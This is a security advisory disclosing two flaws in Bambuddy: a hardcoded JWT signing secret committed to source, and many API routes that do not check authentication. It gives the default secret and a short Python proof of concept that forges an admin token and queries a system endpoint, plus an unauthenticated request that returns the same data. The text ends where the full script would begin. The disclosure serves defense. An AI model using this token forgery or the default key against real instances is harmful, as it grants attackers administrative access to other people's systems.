GHSA-gc24-px2r-5qmf

Summary

1. A hardcoded secret key used for signing JWTs is checked into source code
2. ManyAPI routes do not check authentication

Details

I am using the publicly available docker image at ghcr.io/maziggy/bambuddy

1. Hardcoded JWT Secret Key

https://github.com/maziggy/bambuddy/blob/a9bb8ed8239602bf08a9914f85a09eeb2bf13d15/backend/app/core/auth.py#L28

<details> <summary>Copying the Authorization token from a request via browser networking tools into JWT.io confirms the token is signed with this key</summary> <img width="1591" height="937" alt="image" src="https://github.com/user-attachments/assets/fd6e805a-9380-438f-a412-623660fa3f5a" /> </details>

Any attacker can:

1. Forge valid JWT tokens for any user
2. Bypass authentication entirely
3. Gain full administrative access to any Bambuddy instance using the default key

Steps to Reproduce:

1. Run an instance of BamBuddy
2. Create admin user
3. Forge and use JWT:

import jwt
import requests

token = jwt.encode({"sub": "admin", "exp": 9999999999}, "bambuddy-secret-key-change-in-production", algorithm="HS256")
resp = requests.get("http://10.0.0.4:8000/api/v1/system/info", headers={"Authorization": f"Bearer {token}"})

print(resp.status_code) # 200
print(resp.text) # {"app":{"version":"0.1.7b","base_dir":"/app/data","archive_dir":"/app/data/archive"},"database": ...

2. Most API Routes do not check Auth

While investigating the JWT forgery, I noticed that requests without Authorization headers still returned information for many endpoints:

resp = requests.get("http://10.0.0.4:8000/api/v1/system/info", headers={}) # Empty headers

print(resp.status_code) # 200
print(resp.text) # {"app":{"version":"0.1.7b","base_dir":"/app/data","archive_dir":"/app/data/archive"},"database": ...

Full Script and Output

Note: I do not have smart plugs or spoolman set up to verify actual behavior with those endpoints so they are excluded from this script.

<details>...